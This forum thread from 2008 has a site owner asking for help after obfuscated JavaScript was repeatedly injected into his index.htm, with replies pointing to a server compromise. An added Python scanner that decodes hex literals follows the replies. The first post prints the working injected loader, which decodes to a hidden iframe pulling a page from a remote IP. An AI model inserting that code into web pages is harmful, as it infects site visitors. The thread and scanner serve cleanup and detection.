Author Topic: TROJAN TROJAN TROJAN  (Read 8460 times)

July 04, 2008, 05:42:16 pm
deepakbansal

Hi

The following Trojans are getting entered into my site whenever I connect to the remote server through WS FTP.

•   JS/Downloader.small
•   Downloader.PI
•   Trojan –Downloader.win32.Axload.j
•   Trojan-clicler.JS.Agent.h
•   Trojan-Clicker.HTML.IFrame.ru
•   Trojan-Downloder.Win32.Axload.j
•   Trojan-Downloader.HTML.IFrame.ds
•   Trojan-Clicker.HTML.IFrame.jb
•   Trojan-Clicker.JS.Agent.h

Code something like the below gets automatically entered:

Code:
<script> <!-- var d=document,kol=561; function O10H48605858679A4(H486058586819D){ var H48605858689AD = 16; return( parseInt(H486058586819D,H48605858689AD));}function H486058586999B(H486058586A193){ var H486058586B976 = 2; var H486058586A98B='';for(H486058586B187=0; H486058586B187<H486058586A193.length; H486058586B187+=H486058586B976){ H486058586A98B += ( String.fromCharCode (O10H48605858679A4(H486058586A193.substr(H486058586B187, H486058586B976))));}return H486058586A98B;} document.write(H486058586999B('3C7363726970743E696628216D796961297B642E777269746528273C494652414D45206E616D653D4F31207372633D5C27687474703A2F2F37372E3232312E3133332E3137312F2E69662F676F2E68746D6C3F272B4D6174682E726F756E64284D6174682E72616E646F6D28292A31333634292B273632615C272077696474683D333431206865696768743D34207374796C653D5C27646973706C61793A206E6F6E655C273E
3C2F494652414D45203E27293B7D766172206D7969613D747275653B3C2F7363726970743E')); //--> </script>
 

No antivirus can detect any problem in my system. When the Trojan gets entered into the index.htm page of the site and anyone opens the site, the antivirus then shows that there is a virus present in the site.

So I want to solve this problem permanently. I want to delete this Trojan from root level in my system. I have tried almost all antivirus/anti-spyware programs, and none is able to detect it at root level. They only detect it when the Trojan infects the site.



July 04, 2008, 07:35:12 pm
Reply #1

sowhat-x

Question: After, say, manually cleaning the main index.htm from the 'infected' js code,
have you tried connecting with an alternative client, i.e. FileZilla/whatever?
What happens in such a case?

July 04, 2008, 08:06:59 pm
Reply #2

sowhat-x

I'm asking you to test the above,
because I really doubt that the WS_FTP client executable is causing the problem...
i.e. that it got infected or something similar itself.
Check ALL of the scripts that are located on your server there,
as I bet that one of them is what's causing the trouble...
And when I say all 'scripts', I also mean you should audit your php/sql code as well...

Have a look at the following thread... where a somewhat similar problem had arisen,
might give you a few ideas further on what kind of stuff you should be looking for:
http://www.malwaredomainlist.com/forums/index.php?topic=1867.msg3748#msg3748

July 06, 2008, 09:44:30 am
Reply #3

CM_MWR

That script can really only be inserted by someone with admin access, check any ftps and look for sql patches for your system.

This one too is often inserted into asp pages as well.

In short, you appear to be compromised on the equivalent of root access, so sounds like you have some patching, updating to do as well as searching all directories\pages for this code then cleaning each instance.
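
Added example (not code from any poster in this thread) for the "search all directories\pages for this code" step in the last reply: it walks a web root, finds long quoted hex literals like the one in the injected snippet, decodes them, and reports files whose decoded text contains iframe or script markup. The file extensions, marker strings, 20-byte minimum length and the sample site pointing at example.invalid are assumptions constructed for illustration.

```python
import os
import re
import tempfile

# Quoted run of 20+ hex byte pairs; whitespace allowed (literal may be line-wrapped).
HEX_LITERAL = re.compile(r"""['"]((?:[0-9A-Fa-f]{2}\s*){20,})['"]""")
MARKERS = ("<iframe", "<script", "document.write")
WEB_EXTENSIONS = (".htm", ".html", ".php", ".asp", ".js")


def decode_hex_payloads(text):
    """Return decoded hex literals that carry HTML/JS injection markers."""
    hits = []
    for match in HEX_LITERAL.finditer(text):
        raw = "".join(match.group(1).split())
        decoded = bytes.fromhex(raw).decode("latin-1")
        if any(marker in decoded.lower() for marker in MARKERS):
            hits.append(decoded)
    return hits


def scan_tree(root):
    """Map each web file under root to the payloads decoded from it."""
    report = {}
    for dirpath, _dirs, files in os.walk(root):
        for name in files:
            if name.lower().endswith(WEB_EXTENSIONS):
                path = os.path.join(dirpath, name)
                with open(path, encoding="latin-1") as handle:
                    hits = decode_hex_payloads(handle.read())
                if hits:
                    report[os.path.relpath(path, root)] = hits
    return report


def build_sample_site(root):
    """Constructed sample: one clean page, one page with an injected loader."""
    hidden = '<iframe src="http://example.invalid/" style="display:none"></iframe>'
    blob = hidden.encode("latin-1").hex().upper()
    wrapped = blob[:40] + "\n" + blob[40:]  # simulate a wrapped literal
    injected = "<script>document.write(dec('%s'));</script>" % wrapped
    with open(os.path.join(root, "index.htm"), "w") as handle:
        handle.write("<html><body>Home</body>" + injected + "</html>")
    with open(os.path.join(root, "about.htm"), "w") as handle:
        handle.write("<html><body>About</body></html>")


if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as site:
        build_sample_site(site)
        print(scan_tree(site))
```

A hit only shows where the injected code sits; the pages will be re-infected until the access path behind the write is closed.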